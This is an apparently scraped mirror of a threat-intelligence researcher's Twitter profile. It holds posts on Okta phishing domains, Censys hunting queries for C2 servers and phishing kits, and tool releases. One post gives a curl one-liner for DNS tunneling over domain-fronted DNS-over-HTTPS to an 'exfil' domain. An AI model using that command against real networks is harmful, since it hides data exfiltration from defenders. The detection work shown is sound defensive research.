Olivia
Online
Brett Fitzpatrick
@_brettfitz
security, stonks, games. Lead Security Engineer. Previously IronRadar. Developing proactive threat intelligence capabilities.
Joined August 2010
505 Following
735 Followers
5.1K Posts
ย Pinned Tweet
Finally finished v0.3 of ๐ฆpyMalleableProfileParser ๐ฅณ
- Complete overhaul of code base
- You can now validate Malleable Profiles (4.0+)
Upgrading is fairly easy:
pip3 install --upgrade pyMalleableProfileParser
Source: https://t.co/gvZuykMpjx
#CobaltStrike
@steipete Do Okta + Microsoft Defender or Elastic Security. CrowdStrike agent + UX is terrible IMO.
@Wietze talking about hit awesome LNK research at @NorthSec_io
Live here > https://t.co/FhAY0theFd
Good morning ๐บ๐ธ
I caught up on my beauty sleep, the team put out an excellent write up of the axios ๐๏ธ๐ฅ: https://t.co/ajdbHrEfBX
Dangling threads I'm monitoring:
- Reporte bug in the linux payload (@N3mes1s)
- DPRK attribution (@DefSecSentinel)
- Addt'l infra (@InvictusIR)
Who to follow
C2IntelFeedsBot
@drb_ra
Mostly here for posting C2s.
Thank you to @modat_magnify for the raw data.
Grateful to @censysio for the support in past years.
Chris Duggan
@TLP_R3D
Full-Time Explorer | MDS Legendary Finisher | Ultra Endurance | From Cyber Intel to the Desert | Author- The Intent Model
Squiblydoo
@SquiblydooBlog
Malware Analysis
Creator of Debloat, certReport, and https://t.co/hEJGt0jzIq
Want to chat? Join the Debloat discord: https://t.co/ZcWIqa6ZA9
Canโt wait to see this get abused for phishing and delivery ๐ญ
From Claude Code to the web in seconds.
No git push. No build step. 100% free.
Just say: publish to https://t.co/imLVKNiwwV
๐๐๐๐ ๐น๐ฎ๐๐ป๐ฐ๐ต๐ฒ๐ฑ ๐ฎ๐๐ฒ๐๐ผ๐บ๐ฒ-๐ฑ๐ณ๐ถ๐ฟ-๐๐ธ๐ถ๐น๐น๐ ๐๐ถ๐๐ต @fr0gger_ !
Designed to save time during investigations and everyday DFIR tasks
Thomas has built an excellent malware triage skill, and Iโve added a couple of timeline analysis skills to help you get started. Feel free to contribute and use these skills to save a ton of time, like we already do.
https://t.co/HbT67gyVbb
Learn about skills:
- https://t.co/Wj9yZwv80U
- https://t.co/PVqnvOPdNb
Threat cluster is performing wide net phishing campaigns targeting Okta users for big game hunting. Instead of targeted phishing campaigns with company branded Okta phishing sites, the cluster is leveraging a generic Okta login page to simplify operations:
okta.login-enterprisesso[.]com
okta.login-request[.]com
sso-accountservices[.]com
Tracking a phishkit that is leveraged by a cluster under "the comm":
(hash:"1aa9ba7cd3843882cfa388e92424c114524a3bcecd93eb7d4bd769a410589fc4" OR hash:"8fefa240ca7765401b4a08ab87fab4b2521c9339ef540a700fefbfc2e94850a3")
AND NOT page.domain:https://t.co/RQiv3LPRdb
@censysio 80.78.25[.]153 --> okta-galaxydigital[.]com
80.78.25[.]147 --> gsrio-okta[.]com
Likely #ScatteredSpider Cluster (G1015)
@censysio Query
(
services.banner_hashes="sha256:4e790c829f6352c5648575f97a399a98cbd5f7e324b82579e179604f134f184e" AND (services.tls.certificates.leaf_data.names: *okta-*.com OR services.tls.certificates.leaf_data.names: *-okta*.com)
)
https://t.co/apQ9fEZ176
Censys Query
same_service(services.telnet.banner="xlogin:" and services.port: 7777) and https://t.co/whuszO3spc.vendor=`TP-LINK` and services.port: 11288
Fingerprint via Censys:
services.banner_hashes="sha256:dfe5574717fa51535df774105f82349026aa9d1a846e4a6741cb664f0f5adb3a"
There is an interesting http service located on
18.194.131[.]106:80
Shares the same characteristics of a C2 listener attributed to APT28 by @_CERT_UA. However, they typically drop SSH on a non-standard port.
Anyone else with insights drop a DM.
๐ฆ v0.2.0 aws-sso-manager released today
- Bug fixes
- Enhancements to CI workflow (gha)
https://t.co/pP8TF3rF7H
Todayโs trick:
DNS tunneling over Domain-Fronted DoH:
curl -svk --resolve *:443:8.8.8.8 'https://yahoo[.]com/resolve?name=exfil.kittens[.]com&type=a'
If youโre running Splunk enterprise and donโt have it behind a corp VPN/SDP update ASAP!
(Still update regardless of course)
https://t.co/dprMpdJmdJ
@censysio Also - this query is a wider net and just looking for the format (oid order). You can apply a much more rigid query using regex.
How does one distinguish generated self-signed certificates for Sliver and Havoc? ๐
Havoc copied sliver's v1 cert generator but there is a key difference in the process. Sliver only fills in the subject DN whereas havoc fills in both the issuer and the subject with the same DN.
One could filter for this in @censysio using the following query:
same_service(services.tls.certificates.leaf_data.subject_dn="C=*, ST=*, L=*, street=*, O=*, CN=*" and not services.tls.certificates.leaf_data.issuer: *)
Note: The wildcard will catch the possible postal code RDN.
@CYBERWARCON still waiting for my access link ๐
Last Seen Users on Sotwe
ุญููู ุงูุจุตุฑุฉ๐ ููุนูุงุฆู ูุงูุณูุงูุจ๐ + ุชุจุงุฏู ุนู
ุฑู 19
biondinodisatana
Seen from Italy
เธซเธธเนเธเธซเธกเธตเนเธเธตเนเธขเธ
Seen from Thailand
Mia K.
Yetiลkinler ฤฐรงin Videolar +18
Seen from Turkey
x_cuto๐
Seen from Malaysia
yerli ifsa
Fuck Aunty
Seen from Pakistan
ๅซๅญๅคธๆๅผบ
Seen from Thailand
pantyhoser01
Seen from Turkey
Most Popular Users
Elon Musk
@elonmusk
240.2M followers
Barack Obama
@barackobama
119.3M followers
Donald J. Trump
@realdonaldtrump
111.6M followers
Cristiano Ronaldo
@cristiano
109M followers
Narendra Modi
@narendramodi
107M followers
Rihanna
@rihanna
97.3M followers
NASA
@nasa
92.1M followers
Justin Bieber
@justinbieber
90.6M followers
KATY PERRY
@katyperry
86.8M followers
Taylor Swift
@taylorswift13
80.6M followers
Lady Gaga
@ladygaga
72.2M followers
Kim Kardashian
@kimkardashian
69.4M followers
YouTube
@youtube
68.6M followers
Virat Kohli
@imvkohli
68.6M followers
Bill Gates
@billgates
63.4M followers
The Ellen Show
@theellenshow
62.5M followers
CNN
@cnn
61.9M followers
Neymar Jr
@neymarjr
61.1M followers
X
@x
60.9M followers
Selena Gomez
@selenagomez
59.9M followers